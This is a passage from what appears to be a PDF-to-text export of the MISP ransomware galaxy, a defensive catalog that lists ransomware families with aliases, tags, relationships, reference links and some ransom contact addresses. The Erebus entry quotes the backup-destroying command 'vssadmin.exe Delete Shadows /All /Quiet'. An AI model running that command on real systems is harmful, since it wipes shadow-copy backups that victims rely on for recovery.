This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="AiraCrop Ransomware"`

Table 5188. Table References
JapanLocker Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Base64 encoding, ROT13, and top-bottom swapping

The tag is: *misp-galaxy:ransomware="JapanLocker Ransomware"*

JapanLocker Ransomware is also known as:

- SHC Ransomware
- SHCLocker
- SyNcription

Table 5189. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/japanlocker-ransomware.html</a></td>
</tr>
<tr>
<td><a href="https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker">https://www.cyber.nj.gov/threat-profiles/ransomware-variants/japanlocker</a></td>
</tr>
<tr>
<td><a href="https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots">https://blog.fortinet.com/2016/10/19/japanlocker-an-excavation-to-its-indonesian-roots</a></td>
</tr>
</tbody>
</table>

Anubis Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. EDA2

The tag is: *misp-galaxy:ransomware="Anubis Ransomware"*

Table 5190. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/anubis-ransomware.html</a></td>
</tr>
<tr>
<td><a href="http://nyxbone.com/malware/Anubis.html">http://nyxbone.com/malware/Anubis.html</a></td>
</tr>
</tbody>
</table>
**XTPLocker 5.0 Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="XTPLocker 5.0 Ransomware"`

---

**Exotic Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Also encrypts executables

The tag is: `misp-galaxy:ransomware="Exotic Ransomware"`

---

**APT Ransomware v.2**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. NO POINT TO PAY THE RANSOM, THE FILES ARE COMPLETELY DESTROYED

The tag is: `misp-galaxy:ransomware="APT Ransomware v.2"`

---
Windows_Security Ransonware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Windows_Security Ransonware"`

Windows_Security Ransonware is also known as:

- WS Go Ransonware
- Trojan.Encoder.6491

Windows_Security Ransonware has relationships with:

- similar: `misp-galaxy:ransomware="Encoder.xxxx"` with `estimative-language:likelihood-probability="likely"

Table 5194. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html">https://id-ransomware.blogspot.co.il/2016/10/ws-go-ransonware.html</a></td>
</tr>
<tr>
<td><a href="https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2">https://www.cyber.nj.gov/threat-profiles/ransomware-variants/apt-ransomware-v2</a></td>
</tr>
</tbody>
</table>

NCrypt Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="NCrypt Ransomware"`

Table 5195. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/ncrypt-ransomware.html</a></td>
</tr>
</tbody>
</table>

Venis Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. In devVenisRansom@protonmail.com

The tag is: `misp-galaxy:ransomware="Venis Ransomware"`
Enigma 2 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: `misp-galaxy:ransomware="Enigma 2 Ransomware"`

Deadly Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. sample is set to encrypt only in 2017...

The tag is: `misp-galaxy:ransomware="Deadly Ransomware"

Deadly Ransomware is also known as:

- Deadly for a Good Purpose Ransomware

Comrade Circle Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
The tag is: misp-galaxy:ransomware="Comrade Circle Ransomware"

Table 5199. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/comrade-circle-ransomware.html</a></td>
</tr>
</tbody>
</table>

Globe2 Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Globe2 Ransomware"

Globe2 Ransomware is also known as:

- Purge Ransomware

Globe2 Ransomware has relationships with:

- similar: misp-galaxy:ransomware="Globe3 Ransomware" with estimative-language:likelihood-probability="likely"

Table 5200. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/globe2-ransomware.html</a></td>
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<tr>
<td><a href="https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221">https://success.trendmicro.com/portal_kb_articledetail?solutionid=1114221</a></td>
</tr>
</tbody>
</table>

Kostya Ransomware

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: misp-galaxy:ransomware="Kostya Ransomware"

Table 5201. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/kostya-ransomware.html</a></td>
</tr>
</tbody>
</table>
**Fs0ciety Locker Ransomware**

This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..

The tag is: *misp-galaxy:ransomware=*"Fs0ciety Locker Ransomware"

<table>
<thead>
<tr>
<th>Table 5202. Table References</th>
</tr>
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<tbody>
<tr>
<td>Links</td>
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<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/fs0ciety-locker-ransomware.html</a></td>
</tr>
</tbody>
</table>

**Erebus Ransomware**

It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. After the files are decrypted, the shadow files are deleted using the following command: vssadmin.exe Delete Shadows /All /Quiet

The tag is: *misp-galaxy:ransomware=*"Erebus Ransomware"

<table>
<thead>
<tr>
<th>Table 5203. Table References</th>
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</thead>
<tbody>
<tr>
<td>Links</td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html">https://id-ransomware.blogspot.co.il/2016/09/erebus-ransomware.html</a></td>
</tr>
</tbody>
</table>

**WannaCry**

According to numerous open-source reports, a widespread ransomware campaign is affecting various organizations with reports of tens of thousands of infections in as many as 74 countries, including the United States, United Kingdom, Spain, Russia, Taiwan, France, and Japan. The software can run in as many as 27 different languages. The latest version of this ransomware variant, known as WannaCry, WCry, or Wanna Decryptor, was discovered the morning of May 12, 2017, by an independent security researcher and has spread rapidly over several hours, with initial reports beginning around 4:00 AM EDT, May 12, 2017. Open-source reporting indicates a requested ransom of .1781 bitcoins, roughly $300 U.S.

The tag is: *misp-galaxy:ransomware=*"WannaCry"

WannaCry is also known as:

- WannaCrypt
- WannaCry
- WanaCrypt0r
- WCrypt
• **WCry**

WannaCry has relationships with:

• similar: `misp-galaxy:malpedia="WannaCryptor"` with `estimative-language:likelihood-probability="likely"`

*Table 5204. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168">https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168</a></td>
</tr>
</tbody>
</table>

**.CryptoHasYou.**

Ransomware

The tag is: `misp-galaxy:ransomware=".CryptoHasYou."`

*Table 5205. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.nyxbone.com/malware/CryptoHasYou.html">http://www.nyxbone.com/malware/CryptoHasYou.html</a></td>
</tr>
</tbody>
</table>

**777**

Ransomware

The tag is: `misp-galaxy:ransomware="777"`

777 is also known as:

• Sevleg

*Table 5206. Table References*

<table>
<thead>
<tr>
<th>Links</th>
</tr>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/777">https://decrypter.emsisoft.com/777</a></td>
</tr>
</tbody>
</table>

**7ev3n**

Ransomware

The tag is: `misp-galaxy:ransomware="7ev3n"`

7ev3n is also known as:

• 7ev3n-HONE$T

7ev3n has relationships with:
• similar: misp-galaxy:malpedia="7ev3n" with estimative-language:likelihood-probability="likely"

Table 5207. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://github.com/hasherezade/malware_analysis/tree/master/7ev3n">https://github.com/hasherezade/malware_analysis/tree/master/7ev3n</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=RDNhS5HDO1E&amp;feature=youtu.be">https://www.youtube.com/watch?v=RDNhS5HDO1E&amp;feature=youtu.be</a></td>
</tr>
<tr>
<td><a href="http://www.nyxbone.com/malware/7ev3n-HONE$T.html">http://www.nyxbone.com/malware/7ev3n-HONE$T.html</a></td>
</tr>
</tbody>
</table>

8lock8

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="8lock8"

Table 5208. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-itxt/">http://www.bleepingcomputer.com/forums/t/614025/8lock8-help-support-topic-8lock8-read-itxt/</a></td>
</tr>
</tbody>
</table>

AiraCrop

Ransomware related to TeamXRat

The tag is: misp-galaxy:ransomware="AiraCrop"

Table 5209. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/PolarToffee/status/796079699478900736">https://twitter.com/PolarToffee/status/796079699478900736</a></td>
</tr>
</tbody>
</table>

Al-Namrood

Ransomware

The tag is: misp-galaxy:ransomware="Al-Namrood"

Table 5210. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/al-namrood">https://decrypter.emsisoft.com/al-namrood</a></td>
</tr>
</tbody>
</table>

ALFA Ransomware

Ransomware Made by creators of Cerber

The tag is: misp-galaxy:ransomware="ALFA Ransomware"
Alma Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alma Ransomware"

Alma Ransomware is also known as:

- Alma Locker

Table 5212. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>
Alpha Ransomware

Ransomware

The tag is: misp-galaxy:ransomware="Alpha Ransomware"

Alpha Ransomware is also known as:

• AlphaLocker

Alpha Ransomware has relationships with:

• similar: misp-galaxy:malpedia="AlphaLocker" with estimative-language:likelihood-probability="likely"

Table S213. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip">http://download.bleepingcomputer.com/demonslay335/AlphaDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/malwarebread/status/804714048499621888">https://twitter.com/malwarebread/status/804714048499621888</a></td>
</tr>
</tbody>
</table>

AMBA

Ransomware Websites only amba@riseup.net

The tag is: misp-galaxy:ransomware="AMBA"

Table S214. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/benkow_/status/747813034006020096">https://twitter.com/benkow_/status/747813034006020096</a></td>
</tr>
<tr>
<td><a href="https://www.enigmasoftware.com/ambaransomware-removal/">https://www.enigmasoftware.com/ambaransomware-removal/</a></td>
</tr>
</tbody>
</table>

AngleWare

Ransomware

The tag is: misp-galaxy:ransomware="AngleWare"

Table S215. Table References
Anony

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Anony"

Anony is also known as:

• ngocanh

Apocalypse

Ransomware decryptionservice@mail.ru recoveryhelp@bk.ru ransomware.attack@list.ru esmeraldaencryption@mail.ru dr.compress@bk.ru

The tag is: misp-galaxy:ransomware="Apocalypse"

Apocalypse is also known as:

• Fabiansomeware

Apocalypse has relationships with:

• similar: misp-galaxy:rat="Apocalypse" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="Apocalypse" with estimative-language:likelihood-probability="likely"

ApocalypseVM

Ransomware Apocalypse ransomware version which uses VMprotect

The tag is: misp-galaxy:ransomware="ApocalypseVM"
AutoLocky
Ransomware
The tag is: misp-galaxy:ransomware="AutoLocky"

Aw3s0m3Sc0t7
Ransomware
The tag is: misp-galaxy:ransomware="Aw3s0m3Sc0t7"

BadBlock
Ransomware
The tag is: misp-galaxy:ransomware="BadBlock"

BaksoCrypt
Ransomware Based on my-Little-Ransomware
The tag is: misp-galaxy:ransomware="BaksoCrypt"
Bandarchor

Ransomware Files might be partially encrypted

The tag is: `misp-galaxy:ransomware="Bandarchor"`

Bandarchor is also known as:

- Rakhni

Bandarchor has relationships with:

- similar: `misp-galaxy:ransomware="Rakhni"` with `estimative-language:likelihood-probability="likely"`

### Table 5223. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://reaqta.com/2016/03/bandarchor-ransomware-still-active/">https://reaqta.com/2016/03/bandarchor-ransomware-still-active/</a></td>
</tr>
</tbody>
</table>

Bart

Ransomware Possible affiliations with RockLoader, Locky and Dridex

The tag is: `misp-galaxy:ransomware="Bart"`

Bart is also known as:

- BaCrypt

Bart has relationships with:

- similar: `misp-galaxy:malpedia="Bart"` with `estimative-language:likelihood-probability="likely"`

### Table 5224. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://now.avg.com/barts-shenanigans-are-no-match-for-avg/">http://now.avg.com/barts-shenanigans-are-no-match-for-avg/</a></td>
</tr>
<tr>
<td><a href="http://phishme.com/rockloader-downloading-new-ransomware-bart/">http://phishme.com/rockloader-downloading-new-ransomware-bart/</a></td>
</tr>
</tbody>
</table>
BitCryptor

Ransomware Has a GUI. CryptoGraphic Locker family. Newer CoinVault variant.

The tag is: misp-galaxy:ransomware="BitCryptor"

Table 5225. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://noransom.kaspersky.com/">https://noransom.kaspersky.com/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html">https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html</a></td>
</tr>
</tbody>
</table>

BitStak

Ransomware

The tag is: misp-galaxy:ransomware="BitStak"

Table 5226. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip">https://download.bleepingcomputer.com/demonslay335/BitStakDecrypter.zip</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/ransomware-007867.html">https://id-ransomware.blogspot.com/2016/07/ransomware-007867.html</a></td>
</tr>
</tbody>
</table>

BlackShades Crypter

Ransomware

The tag is: misp-galaxy:ransomware="BlackShades Crypter"

BlackShades Crypter is also known as:

- SilentShade
- BlackShades

Table 5227. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="http://nyxbone.com/malware/BlackShades.html">http://nyxbone.com/malware/BlackShades.html</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/silentshade-ransomware-blackshades.html">https://id-ransomware.blogspot.com/2016/06/silentshade-ransomware-blackshades.html</a></td>
</tr>
</tbody>
</table>

Blocatto

Ransomware Based on HiddenTear

The tag is: misp-galaxy:ransomware="Blocatto"
Booyah

Ransomware EXE was replaced to neutralize threat

The tag is: `misp-galaxy:ransomware="Booyah"`

Booyah is also known as:

• Salami

Booyah has relationships with:

• similar: `misp-galaxy:ransomware="MM Locker"` with `estimative-language:likelihood=probability="likely"

Brazilian

Ransomware Based on EDA2

The tag is: `misp-galaxy:ransomware="Brazilian"

Brazilian Globe

Ransomware

The tag is: `misp-galaxy:ransomware="Brazilian Globe"

BrLock

Ransomware

The tag is: `misp-galaxy:ransomware="BrLock"`
Browlock
Ransomware no local encryption, browser only

The tag is: `misp-galaxy:ransomware="Browlock"`

BTCWare Related to / new version of CryptXXX
Ransomware

The tag is: `misp-galaxy:ransomware="BTCWare Related to / new version of CryptXXX"`

Bucbi
Ransomware no file name change, no extension

The tag is: `misp-galaxy:ransomware="Bucbi"`

BuyUnlockCode
Ransomware Does not delete Shadow Copies

The tag is: `misp-galaxy:ransomware="BuyUnlockCode"`
Central Security Treatment Organization

Ransomware

The tag is: `misp-galaxy:ransomware="Central Security Treatment Organization"`

Central Security Treatment Organization has relationships with:

- similar: `misp-galaxy:ransomware="CryLocker"` with `estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="CryLocker"` with `estimative-language:likelihood-probability="likely"

Table 5235. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html">https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html</a></td>
</tr>
</tbody>
</table>

Cerber

Ransomware

The tag is: `misp-galaxy:ransomware="Cerber"`

Cerber is also known as:

- CRBR ENCRYPTOR

Cerber has relationships with:

- similar: `misp-galaxy:malpedia="Cerber"` with `estimative-language:likelihood-probability="likely"

Table 5236. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/">https://blog.malwarebytes.org/threat-analysis/2016/03/cerber-ransomware-new-but-mature/</a></td>
</tr>
</tbody>
</table>

Chimera

Ransomware
The tag is: *misp-galaxy:ransomware="Chimera"*

Chimera is also known as:

- Quimera Crypter
- Pashka

**Table 5237. Table References**

<table>
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<th>Links</th>
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</table>

**Clock**

Ransomware Does not encrypt anything

The tag is: *misp-galaxy:ransomware="Clock"*

**Table 5238. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/JakubKroustek/status/794956809866018816">https://twitter.com/JakubKroustek/status/794956809866018816</a></td>
</tr>
</tbody>
</table>

**CoinVault**

Ransomware CryptoGraphic Locker family. Has a GUI. Do not confuse with CrypVault!

The tag is: *misp-galaxy:ransomware="CoinVault"*

**Table 5239. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://noransom.kaspersky.com/">https://noransom.kaspersky.com/</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html">https://id-ransomware.blogspot.com/2016/05/bitcryptor-ransomware-aes-256-1-btc.html</a></td>
</tr>
</tbody>
</table>

**Coverton**

Ransomware

The tag is: *misp-galaxy:ransomware="Coverton"*

**Table 5240. Table References**

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
Cryaki
Ransomware
The tag is: misp-galaxy:ransomware="Cryaki"

Table 5241. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

Crybola
Ransomware
The tag is: misp-galaxy:ransomware="Crybola"

Table 5242. Table References
Links
https://support.kaspersky.com/viruses/disinfection/8547

CryFile
Ransomware
The tag is: misp-galaxy:ransomware="CryFile"

Table 5243. Table References
Links
SHTODELATVAM.txt[SHTODELATVAM.txt]
Instructionaga.txt[Instructionaga.txt]
https://id-ransomware.blogspot.com/2016/06/cryfile-ransomware-100.html

CryLocker
Ransomware Identifies victim locations w/Google Maps API
The tag is: misp-galaxy:ransomware="CryLocker"

Cry Locker is also known as:
- Cry
- CSTO
- Central Security Treatment Organization

CryLocker has relationships with:

- similar: misp-galaxy:ransomware="Central Security Treatment Organization" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:malpedia="CryLocker" with estimative-language:likelihood-probability="likely"

Table 5244. Table References

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<thead>
<tr>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html">https://id-ransomware.blogspot.com/2016/09/cry-ransomware.html</a></td>
</tr>
</tbody>
</table>

**CrypMIC**

Ransomware CryptXXX clone/spinoff

The tag is: misp-galaxy:ransomware="CrypMIC"

Table 5245. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/07/crypmic-ransomware-aes-256.html">https://id-ransomware.blogspot.com/2016/07/crypmic-ransomware-aes-256.html</a></td>
</tr>
</tbody>
</table>

**Crypren**

Ransomware

The tag is: misp-galaxy:ransomware="Crypren"

Table 5246. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://github.com/pekeinfo/DecryptCrypren">https://github.com/pekeinfo/DecryptCrypren</a></td>
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<tr>
<td><a href="http://www.nyxbone.com/malware/Crypren.html">http://www.nyxbone.com/malware/Crypren.html</a></td>
</tr>
<tr>
<td><a href="http://www.nyxbone.com/images/articulos/malware/crypren/0.png">http://www.nyxbone.com/images/articulos/malware/crypren/0.png</a></td>
</tr>
</tbody>
</table>
Crypt38
Ransomware

The tag is: misp-galaxy:ransomware="Crypt38"

Table 5247. Table References
Links

https://download.bleepingcomputer.com/demonslay335/Crypt38Keygen.zip
https://blog.fortinet.com/2016/06/17/buggy-russian-ransomware-inadvertently-allows-free-decryption

Crypter
Ransomware Does not actually encrypt the files, but simply renames them

The tag is: misp-galaxy:ransomware="Crypter"

Table 5248. Table References
Links

https://twitter.com/jiriatvirlab/status/802554159564062722

CryptFile2
Ransomware

The tag is: misp-galaxy:ransomware="CryptFile2"

CryptFile2 is also known as:
• Lesli

Table 5249. Table References
Links

https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html

CryptInfinite
Ransomware

The tag is: misp-galaxy:ransomware="CryptInfinite"
CryptInfinite is also known as:

- DecryptorMax

**Table 5250. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html">https://id-ransomware.blogspot.com/2016/06/cryptfile2-ransomware-rsa-email.html</a></td>
</tr>
</tbody>
</table>

**CryptoBit**

Ransomware sekretzelongt0us.KEY - do not confuse with CryptorBit.

The tag is: *misp-galaxy:ransomware="CryptoBit"*

CryptoBit has relationships with:

- similar: *misp-galaxy:ransomware="Mobef"* with *estimative-language:likelihood-probability="likely"

**Table 5251. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/">http://www.pandasecurity.com/mediacenter/panda-security/cryptobit/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptobit-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptobit-ransomware.html</a></td>
</tr>
</tbody>
</table>

**CryptoDefense**

Ransomware no extension change

The tag is: *misp-galaxy:ransomware="CryptoDefense"*

**Table 5252. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></td>
</tr>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptodefense-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptodefense-ransomware.html</a></td>
</tr>
</tbody>
</table>

**CryptoFinancial**

Ransomware

The tag is: *misp-galaxy:ransomware="CryptoFinancial"*

CryptoFinancial is also known as:

3000
• Ranscam

CryptoFinancial has relationships with:

• similar: misp-galaxy:malpedia="Ranscam" with estimative-language:likelihood-probability="likely"

**Table 5253. Table References**

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/search?q=CryptoFinancial">https://id-ransomware.blogspot.com/search?q=CryptoFinancial</a></td>
</tr>
</tbody>
</table>

**CryptoFortress**

Ransomware Mimics Torrentlocker. Encrypts only 50% of each file up to 5 MB

The tag is: misp-galaxy:ransomware="CryptoFortress"

CryptoFortress has relationships with:

• similar: misp-galaxy:ransomware="TorrentLocker" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="CryptoFortress" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:malpedia="TorrentLocker" with estimative-language:likelihood-probability="likely"

**Table 5254. Table References**

<table>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/05/cryptofortress-ransomware-aes-256-1.html">https://id-ransomware.blogspot.com/2016/05/cryptofortress-ransomware-aes-256-1.html</a></td>
</tr>
</tbody>
</table>

**CryptoGraphic Locker**

Ransomware Has a GUI. Subvariants: CoinVault BitCryptor

The tag is: misp-galaxy:ransomware="CryptoGraphic Locker"

**CryptoHost**

Ransomware RAR's victim's files has a GUI

The tag is: misp-galaxy:ransomware="CryptoHost"

CryptoHost is also known as:
• Manamecrypt
• Telograph
• ROI Locker

CryptoHost has relationships with:

• similar: misp-galaxy:malpedia="ManameCrypt" with estimative-language:likelihood-probability="likely"

Table 5255. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://id-ransomware.blogspot.com/2016/04/cryptohost-ransomware.html">https://id-ransomware.blogspot.com/2016/04/cryptohost-ransomware.html</a></td>
</tr>
</tbody>
</table>

**CryptoJoker**

Ransomware

The tag is: misp-galaxy:ransomware="CryptoJoker"

CryptoJoker has relationships with:

• similar: misp-galaxy:ransomware="CryptoNar" with estimative-language:likelihood-probability="likely"

Table 5256. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
</table>

**CryptoLocker**

Ransomware no longer relevant

The tag is: misp-galaxy:ransomware="CryptoLocker"

CryptoLocker has relationships with:

• similar: misp-galaxy:malpedia="CryptoLocker" with estimative-language:likelihood-probability="likely"

Table 5257. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
</table>
CryptoLocker 1.0.0

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 1.0.0"

Table 5258. Table References

Links

https://twitter.com/malwrhunterteam/status/839747940122001408

CryptoLocker 5.1

Ransomware

The tag is: misp-galaxy:ransomware="CryptoLocker 5.1"

Table 5259. Table References

Links

https://twitter.com/malwrhunterteam/status/782890104947867649

CryptoMix

Ransomware

The tag is: misp-galaxy:ransomware="CryptoMix"

CryptoMix is also known as:

• Zeta

CryptoMix has relationships with:

• similar: misp-galaxy:malpedia="CryptoMix" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-0000" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Arena" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Azer" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-Backup" with estimative-language:likelihood-probability="likely"
• similar: misp-galaxy:ransomware="CryptoMix-CK" with estimative-language:likelihood-
